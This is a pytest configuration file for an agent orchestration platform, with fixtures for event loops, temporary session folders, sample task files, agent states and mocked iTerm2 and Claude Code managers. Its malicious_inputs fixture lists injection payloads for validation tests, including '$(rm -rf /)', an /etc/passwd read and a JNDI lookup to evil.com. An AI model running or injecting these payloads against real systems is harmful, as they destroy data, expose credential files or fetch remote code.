"""
Global pytest configuration and fixtures for Agent Orchestration Platform testing.
This module provides comprehensive testing infrastructure including:
- Event loop configuration for async testing
- Mock managers for external dependencies (iTerm2, Claude Code)
- Domain-specific test fixtures
- Temporary filesystem setup for isolated testing
- Sample data generators for consistent testing
Author: Adder_1 | Created: 2025-06-26 | Testing Infrastructure Task
"""
import pytest
import pytest_asyncio
import asyncio
from pathlib import Path
from typing import AsyncGenerator, Dict, Any, List
from unittest.mock import AsyncMock
from dataclasses import dataclass
from datetime import datetime
# Import test fixtures and mocks (will be created in subsequent subtasks)
# from tests.mocks.iterm_manager import MockiTermManager
# from tests.mocks.claude_code import MockClaudeCodeManager
# from tests.fixtures.domain import *
# ============================================================================
# Pytest Configuration and Event Loop Setup
# ============================================================================
# Configure pytest for async testing
pytest_plugins = ["pytest_asyncio"]
@pytest.fixture(scope="session")
def event_loop():
"""Create an instance of the default event loop for the test session."""
policy = asyncio.get_event_loop_policy()
loop = policy.new_event_loop()
asyncio.set_event_loop(loop)
try:
yield loop
finally:
loop.close()
@pytest.fixture(scope="function")
def clean_event_loop():
"""Provide a clean event loop for each test function."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
yield loop
finally:
loop.close()
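# Illustrative usage (comment only; conftest.py itself is never collected as a
# test module): an async test in a regular test module runs on the loop
# configured above, e.g.:
#
#   @pytest.mark.asyncio
#   async def test_async_support():
#       await asyncio.sleep(0)  # any awaitable exercises the configured loop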
# ============================================================================
# Temporary Filesystem and Session Management
# ============================================================================
@pytest.fixture
def temp_session_root(tmp_path: Path) -> Path:
"""
Provide temporary directory structure for session testing.
Creates a complete session directory structure with:
- .claude_session/ (encrypted session metadata)
- development/ (ADDER+ workflow files)
- development/tasks/ (individual task files)
- .git/ (Git integration simulation)
"""
session_dir = tmp_path / "test_session"
session_dir.mkdir()
# Create session metadata directory
claude_session_dir = session_dir / ".claude_session"
claude_session_dir.mkdir()
# Create development workflow structure
dev_dir = session_dir / "development"
dev_dir.mkdir()
tasks_dir = dev_dir / "tasks"
tasks_dir.mkdir()
protocols_dir = dev_dir / "protocols"
protocols_dir.mkdir()
# Create git directory (simulation)
git_dir = session_dir / ".git"
git_dir.mkdir()
# Create basic project structure
src_dir = session_dir / "src"
src_dir.mkdir()
tests_dir = session_dir / "tests"
tests_dir.mkdir()
return session_dir
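# Illustrative usage (hypothetical test module): the fixture returns a fully
# populated session root, so a test can assert on the layout directly:
#
#   def test_session_layout(temp_session_root):
#       assert (temp_session_root / ".claude_session").is_dir()
#       assert (temp_session_root / "development" / "tasks").is_dir()
#       assert (temp_session_root / ".git").is_dir()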
@pytest.fixture
def sample_todo_content() -> str:
"""Provide sample TODO.md content for testing task management."""
return '''# Project Task Management Dashboard
**Project**: Test Project
**Last Updated**: 2025-06-26 by Adder_1
**Overall Progress**: 2/5 tasks complete
## Task Status Overview
- **NOT_STARTED**: 1 🔴
- **IN_PROGRESS**: 2 🟡
- **REVIEW_READY**: 0 🟠
- **COMPLETE**: 2 ✅
- **BLOCKED**: 0 ❌
## Current Assignments
| Task | Status | Agent | Priority | Dependencies |
|------|--------|-------|----------|--------------|
| TASK_1 | COMPLETE | Adder_1 | HIGH | None |
| TASK_2 | COMPLETE | Adder_2 | HIGH | None |
| TASK_3 | IN_PROGRESS | Adder_3 | HIGH | TASK_1, TASK_2 |
| TASK_4 | IN_PROGRESS | Adder_4 | MEDIUM | TASK_3 |
| TASK_5 | NOT_STARTED | Unassigned | LOW | TASK_4 |
## Architecture Overview
Test project for validating agent orchestration platform functionality.
'''
@pytest.fixture
def sample_task_content() -> str:
"""Provide sample TASK_X.md content for testing task file parsing."""
return '''# TASK_1: Test Task Implementation
**Created By**: Adder_1 | **Priority**: HIGH | **Duration**: 2 hours
**Technique Focus**: Testing + Validation
**Size Constraint**: Target <200 lines/module
## 📦 Status & Assignment
**Status**: IN_PROGRESS
**Assigned**: Adder_1
**Dependencies**: None
**Blocking**: TASK_2, TASK_3
## ✅ Implementation Subtasks (Sequential completion)
### Phase 1: Setup
- [x] **Subtask 1.1**: Initialize test framework
- [ ] **Subtask 1.2**: Create test cases
- [ ] **Subtask 1.3**: Implement validation
### Phase 2: Execution
- [ ] **Subtask 2.1**: Run tests
- [ ] **Subtask 2.2**: Validate results
## Success Criteria
- [ ] All tests passing
- [ ] Coverage above 95%
- [ ] Documentation complete
'''
# ============================================================================
# Domain-Specific Test Data and Types
# ============================================================================
@dataclass
class TestAgentState:
"""Test representation of agent state for testing."""
agent_id: str
session_id: str
name: str
status: str = "ACTIVE"
specialization: str = ""
iterm_tab_id: str = "test_tab_123"
process_id: int = 12345
@dataclass
class TestSessionState:
"""Test representation of session state for testing."""
session_id: str
name: str
root_path: str
created_at: str
agents: Dict[str, TestAgentState]
@pytest.fixture
def sample_agent_state() -> TestAgentState:
"""Provide sample agent state for testing."""
return TestAgentState(
agent_id="agent_test_001",
session_id="session_test_001",
name="Agent_1",
status="ACTIVE",
specialization="ADDER+ Testing",
iterm_tab_id="test_tab_001",
process_id=12345
)
@pytest.fixture
def sample_session_state(temp_session_root: Path) -> TestSessionState:
"""Provide sample session state for testing."""
agent = TestAgentState(
agent_id="agent_test_001",
session_id="session_test_001",
name="Agent_1"
)
return TestSessionState(
session_id="session_test_001",
name="Test Session",
root_path=str(temp_session_root),
created_at=datetime.now().isoformat(),
agents={"agent_test_001": agent}
)
@pytest.fixture
def multiple_agents() -> List[TestAgentState]:
"""Provide multiple agent states for concurrent testing."""
return [
TestAgentState(
agent_id=f"agent_test_{i:03d}",
session_id="session_test_001",
name=f"Agent_{i}",
status="ACTIVE" if i % 2 == 0 else "IDLE",
specialization=f"Specialist_{i}"
)
for i in range(1, 9) # Create 8 agents for testing
]
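# Illustrative usage (hypothetical test module): the eight agents above can be
# exercised concurrently, for example driving one mocked call per agent:
#
#   @pytest.mark.asyncio
#   async def test_concurrent_agent_ops(multiple_agents, mock_iterm_manager):
#       results = await asyncio.gather(
#           *(mock_iterm_manager.send_text(agent.agent_id, "status")
#             for agent in multiple_agents)
#       )
#       assert all(results)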
# ============================================================================
# Mock Infrastructure Fixtures (Placeholder for future implementation)
# ============================================================================
@pytest_asyncio.fixture
async def mock_iterm_manager() -> AsyncGenerator[AsyncMock, None]:
"""
Provide mock iTerm2 manager for testing without iTerm2 dependency.
TODO: Replace with actual MockiTermManager once implemented.
"""
manager = AsyncMock()
# Configure mock behavior
manager.create_tab.return_value = "mock_tab_id_123"
manager.close_tab.return_value = True
manager.send_text.return_value = True
manager.get_tab_status.return_value = {"active": True, "responsive": True}
manager.list_tabs.return_value = ["tab_1", "tab_2", "tab_3"]
# Initialize mock
await manager.initialize()
try:
yield manager
finally:
await manager.cleanup()
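# Illustrative usage (hypothetical test module): the AsyncMock stands in for the
# real iTerm2 manager, so tests can drive and inspect it directly:
#
#   @pytest.mark.asyncio
#   async def test_tab_lifecycle(mock_iterm_manager):
#       tab_id = await mock_iterm_manager.create_tab()
#       assert tab_id == "mock_tab_id_123"
#       assert await mock_iterm_manager.close_tab(tab_id)
#       mock_iterm_manager.create_tab.assert_awaited_once()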
@pytest_asyncio.fixture
async def mock_claude_manager() -> AsyncGenerator[AsyncMock, None]:
"""
Provide mock Claude Code manager for testing without Claude Code dependency.
TODO: Replace with actual MockClaudeCodeManager once implemented.
"""
manager = AsyncMock()
# Configure mock behavior
manager.spawn_process.return_value = {"process_id": 12345, "success": True}
manager.send_message.return_value = {"success": True, "response": "Mock response"}
manager.get_process_status.return_value = {"running": True, "responsive": True}
manager.terminate_process.return_value = True
# Initialize mock
await manager.initialize()
try:
yield manager
finally:
await manager.cleanup()
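# Illustrative usage (hypothetical test module): the spawn/send/terminate flow
# against the mock mirrors how production code is expected to call the manager:
#
#   @pytest.mark.asyncio
#   async def test_claude_roundtrip(mock_claude_manager):
#       spawn = await mock_claude_manager.spawn_process()
#       assert spawn["success"] and spawn["process_id"] == 12345
#       reply = await mock_claude_manager.send_message("ping")
#       assert reply["response"] == "Mock response"
#       assert await mock_claude_manager.terminate_process(spawn["process_id"])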
# ============================================================================
# Security and Validation Test Fixtures
# ============================================================================
@pytest.fixture
def malicious_inputs() -> List[str]:
"""Provide common malicious input patterns for security testing."""
return [
"'; DROP TABLE agents; --", # SQL injection
"<script>alert('xss')</script>", # XSS
"../../../etc/passwd", # Path traversal
"$(rm -rf /)", # Command injection
"'; cat /etc/passwd; echo '", # Command chaining
"\\x00\\x00\\x00\\x00", # Null byte injection
"' OR '1'='1", # Authentication bypass
"${jndi:ldap://evil.com/a}", # Log4j-style injection
"{{7*7}}", # Template injection
"javascript:alert('xss')", # JavaScript protocol
"\r\n\r\nHTTP/1.1 200 OK\r\n", # HTTP response splitting
"eval(document.cookie)", # JavaScript eval injection
]
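# Illustrative usage (hypothetical test module; `sanitize_input` is a placeholder
# for whatever validation routine the platform exposes):
#
#   @pytest.mark.security
#   def test_rejects_malicious_input(malicious_inputs):
#       for payload in malicious_inputs:
#           with pytest.raises(ValueError):
#               sanitize_input(payload)  # hypothetical validation helper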
@pytest.fixture
def valid_agent_names() -> List[str]:
"""Provide valid agent name patterns for testing."""
return [
"Agent_1",
"Agent_99",
"Agent_123",
"Agent_001",
"Agent_42"
]
@pytest.fixture
def invalid_agent_names() -> List[str]:
"""Provide invalid agent name patterns for testing."""
return [
"agent_1", # lowercase
"Agent1", # missing underscore
"Agent_", # missing number
"Agent_abc", # non-numeric
"AGENT_1", # all caps
"", # empty
"Agent_0", # zero (might be invalid)
"Agent_-1", # negative
"Agent_1.5", # decimal
"Agent_1 ", # trailing space
" Agent_1", # leading space
]
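# Illustrative usage (hypothetical test module; `is_valid_agent_name` is a
# placeholder for the platform's actual name validator):
#
#   def test_agent_name_validation(valid_agent_names, invalid_agent_names):
#       assert all(is_valid_agent_name(name) for name in valid_agent_names)
#       assert not any(is_valid_agent_name(name) for name in invalid_agent_names)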
# ============================================================================
# Performance Testing Fixtures
# ============================================================================
@pytest.fixture
def performance_config() -> Dict[str, Any]:
"""Provide configuration for performance testing."""
return {
"max_agents": 8,
"max_concurrent_operations": 16,
"timeout_seconds": 30,
"memory_limit_mb": 512,
"cpu_limit_percent": 25,
"benchmark_iterations": 100,
"warmup_iterations": 10
}
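# Illustrative usage (hypothetical test module): performance tests read their
# budgets from this config instead of hard-coding thresholds, e.g.:
#
#   @pytest.mark.performance
#   def test_operation_stays_within_budget(performance_config):
#       import time
#       start = time.perf_counter()
#       run_operation_under_test()  # hypothetical operation being benchmarked
#       assert time.perf_counter() - start < performance_config["timeout_seconds"]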
# ============================================================================
# CI/CD and Integration Test Fixtures
# ============================================================================
@pytest.fixture
def ci_environment() -> Dict[str, str]:
"""Provide CI environment configuration for testing."""
return {
"CI": "true",
"TESTING_MODE": "automated",
"LOG_LEVEL": "INFO",
"ENABLE_EXTERNAL_SERVICES": "false",
"MOCK_EXTERNAL_DEPENDENCIES": "true"
}
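# Illustrative usage (hypothetical test module): the mapping is normally applied
# through pytest's built-in monkeypatch fixture so variables are restored after
# the test (assumes `os` is imported in that module):
#
#   def test_runs_in_ci_mode(ci_environment, monkeypatch):
#       for key, value in ci_environment.items():
#           monkeypatch.setenv(key, value)
#       assert os.environ["MOCK_EXTERNAL_DEPENDENCIES"] == "true"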
@pytest.fixture(scope="session")
def test_database_url() -> str:
"""Provide test database URL for integration testing."""
return "sqlite:///:memory:"
# ============================================================================
# Cleanup and Teardown Fixtures
# ============================================================================
@pytest.fixture(autouse=True)
def cleanup_temp_files(tmp_path: Path):
"""Automatically cleanup temporary files after each test."""
yield
# Cleanup is automatic with tmp_path fixture
pass
@pytest.fixture(autouse=True)
def reset_asyncio_state():
"""Reset asyncio state between tests to prevent interference."""
    # Best-effort: cancel any pending tasks. In a synchronous fixture there is
    # usually no running loop, so this falls through to the RuntimeError branch.
try:
loop = asyncio.get_running_loop()
tasks = [task for task in asyncio.all_tasks(loop) if not task.done()]
for task in tasks:
task.cancel()
except RuntimeError:
# No running loop, which is fine
pass
yield
# Post-test cleanup
try:
loop = asyncio.get_running_loop()
tasks = [task for task in asyncio.all_tasks(loop) if not task.done()]
for task in tasks:
task.cancel()
except RuntimeError:
pass
# ============================================================================
# Test Markers and Parametrization Helpers
# ============================================================================
def pytest_configure(config):
"""Configure pytest with custom markers and settings."""
# Markers are defined in pyproject.toml
pass
def pytest_collection_modifyitems(config, items):
"""Modify test collection to add automatic markers based on test names."""
for item in items:
# Add markers based on test file location
if "security" in str(item.fspath):
item.add_marker(pytest.mark.security)
if "performance" in str(item.fspath):
item.add_marker(pytest.mark.performance)
if "integration" in str(item.fspath):
item.add_marker(pytest.mark.integration)
if "properties" in str(item.fspath):
item.add_marker(pytest.mark.property)
# Add slow marker for tests that might take time
if any(keyword in item.name.lower() for keyword in ["concurrent", "stress", "benchmark"]):
item.add_marker(pytest.mark.slow)
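# Illustrative command lines: with the markers added above, subsets of the suite
# can be selected at run time, e.g.:
#
#   pytest -m security                 # only security-related tests
#   pytest -m "not slow"               # skip concurrent/stress/benchmark tests
#   pytest -m "integration and slow"   # long-running integration tests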
# ============================================================================
# Debugging and Development Helpers
# ============================================================================
@pytest.fixture
def debug_mode() -> bool:
"""Enable debug mode for detailed test output."""
import os
return os.getenv("PYTEST_DEBUG", "false").lower() == "true"
@pytest.fixture
def capture_logs(caplog):
"""Provide log capture capability for testing logging behavior."""
return caplog
# Mark this as the end of conftest.py setup
pytest.main_fixture_setup_complete = True